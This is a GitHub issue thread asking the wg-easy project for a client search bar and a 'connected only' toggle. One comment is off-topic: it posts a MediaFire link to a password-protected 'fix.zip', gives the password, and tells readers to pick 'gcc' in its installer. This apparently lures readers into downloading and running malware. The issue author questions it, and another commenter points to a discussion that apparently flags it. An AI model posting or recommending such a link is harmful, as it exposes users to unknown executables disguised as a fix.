### ISSUE TITLE
[Feat]: A Search Bar and a Toggle To Show Only Connected Clients

### ISSUE THREAD

**Issue by seikosantana** [wg-easy/wg-easy#1327]
### Description

While the number of clients can grow, I think it would be nice to have a searchbar to quick-search clients, and a toggle to show only connected clients in the list in the web UI. This will help finding the entry of specific clients.

### Suggested Solution

- Have a search bar on top on the list that filters only maching IP addresses or name
- Have a toggle on the top right that filters "connected only"

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seikosantana** [comment]
I'm sorry but what does it have to with the feature?

**Comment by kaaax0815** [comment]
Noted here https://github.com/wg-easy/wg-easy/discussions/1179#discussioncomment-10264297
